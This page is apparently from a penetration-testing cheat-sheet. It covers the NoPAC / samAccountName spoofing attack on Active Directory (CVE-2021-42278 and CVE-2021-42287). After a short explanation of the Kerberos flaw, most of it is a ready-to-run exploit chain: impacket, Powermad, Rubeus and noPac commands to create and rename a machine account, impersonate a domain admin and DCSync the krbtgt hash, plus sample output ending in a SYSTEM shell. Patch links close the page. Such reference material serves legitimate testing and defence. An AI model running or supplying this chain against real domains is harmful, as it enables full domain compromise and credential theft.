nopac.md (9363B)
1 --- 2 title: "NoPAC / samAccountName Spoofing" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/NoPAC.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/NoPAC.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # NoPAC / samAccountName Spoofing 12 13 During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. 14 15 An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. 16 17 For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. 18 An attacker would then create a machine account with the sAMAccountName set to 'DC'. 19 20 The attacker can then request a TGT for the newly created machine account. 21 22 After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. 23 24 The attacker can then perform S4U2Self and request a ST to itself as any user. 25 26 Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. 27 28 **Requirements**: 29 30 * MachineAccountQuota > 0 31 32 **Check for exploitation**: 33 34 * Check the MachineAccountQuota of the account 35 36 ```powershell 37 netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ 38 StandIn.exe --object ms-DS-MachineAccountQuota=* 39 ``` 40 41 * Check if the DC is vulnerable 42 43 ```powershell 44 netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac 45 ``` 46 47 **Exploitation**: 48 49 1. Create a computer account 50 51 ```powershell 52 impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' 53 54 powermad@windows> . .\Powermad.ps1 55 powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force 56 powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose 57 58 sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword 59 ``` 60 61 2. Clear the controlled machine account `servicePrincipalName` attribute 62 63 ```ps1 64 krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController 65 66 powershell@windows> . .\Powerview.ps1 67 powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose 68 ``` 69 70 3. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` 71 72 ```ps1 73 # https://github.com/SecureAuthCorp/impacket/pull/1224 74 impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' 75 76 powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose 77 ``` 78 79 4. Request a TGT for the controlled machine account 80 81 ```ps1 82 impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' 83 84 cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap 85 ``` 86 87 5. Reset the controlled machine account sAMAccountName to its old value 88 89 ```ps1 90 impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' 91 92 powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose 93 ``` 94 95 6. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before 96 97 ```ps1 98 # https://github.com/SecureAuthCorp/impacket/pull/1202 99 impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' 100 101 cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] 102 ``` 103 104 7. DCSync 105 106 ```ps1 107 KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' 108 ``` 109 110 Automated exploitation: 111 112 * [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows 113 114 ```powershell 115 noPac.exe scan -domain htb.local -user user -pass 'password123' 116 noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt 117 noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator 118 ``` 119 120 * [Ridter/noPac](https://github.com/Ridter/noPac) - Linux 121 122 ```ps1 123 python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump 124 ``` 125 126 * [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin) 127 128 ```ps1 129 $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell 130 [*] Selected Target dc.caltech.white 131 [*] Total Domain Admins 11 132 [*] will try to impersonat gaylene.dreddy 133 [*] Current ms-DS-MachineAccountQuota = 10 134 [*] Adding Computer Account "SAMTHEADMIN-11$" 135 [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL 136 [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. 137 [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white 138 [*] SAMTHEADMIN-11$ sAMAccountName == dc 139 [*] Saving ticket in dc.ccache 140 [*] Resting the machine account to SAMTHEADMIN-11$ 141 [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value 142 [*] Using TGT from cache 143 [*] Impersonating gaylene.dreddy 144 [*] Requesting S4U2self 145 [*] Saving ticket in gaylene.dreddy.ccache 146 [!] Launching semi-interactive shell - Careful what you execute 147 C:\Windows\system32>whoami 148 nt authority\system 149 ``` 150 151 * [ly4k/Pachine](https://github.com/ly4k/Pachine) 152 153 ```powershell 154 usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] 155 [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] 156 [domain/]username[:password] 157 $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!' 158 $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!' 159 $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache 160 $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local' 161 ``` 162 163 **Mitigations**: 164 165 * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) 166 * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) 167 * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) 168 * [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31) 169 * [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) 170 * [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) 171 172 ## References 173 174 * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)